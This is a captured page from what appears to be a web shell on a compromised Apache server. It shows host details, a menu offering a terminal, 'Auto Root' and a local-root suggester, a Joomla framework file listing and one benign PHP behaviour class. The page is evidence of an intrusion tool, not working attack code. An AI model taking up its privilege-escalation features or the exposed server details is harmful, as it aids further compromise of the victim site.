Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
libraries /
fof /
model /
behavior /
Delete
Unzip
Name
Size
Permission
Date
Action
access.php
2.21
KB
-rwxr-xr-x
2023-07-08 16:23
emptynonzero.php
858
B
-rwxr-xr-x
2023-07-08 16:23
enabled.php
2.25
KB
-rwxr-xr-x
2023-07-08 16:23
filters.php
2.6
KB
-rwxr-xr-x
2023-07-08 16:23
language.php
4.5
KB
-rwxr-xr-x
2023-07-08 16:23
private.php
2.54
KB
-rwxr-xr-x
2023-07-08 16:23
Save
Rename
<?php /** * @package FrameworkOnFramework * @subpackage model * @copyright Copyright (C) 2010-2016 Nicholas K. Dionysopoulos / Akeeba Ltd. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ // Protect from unauthorized access defined('FOF_INCLUDED') or die; /** * FrameworkOnFramework model behavior class * * @package FrameworkOnFramework * @since 2.1 */ class FOFModelBehaviorEmptynonzero extends FOFModelBehavior { /** * This event runs when we are building the query used to fetch a record * list in a model * * @param FOFModel &$model The model which calls this event * @param FOFDatabaseQuery &$query The query being built * * @return void */ public function onBeforeBuildQuery(&$model, &$query) { $model->setState('_emptynonzero', '1'); } }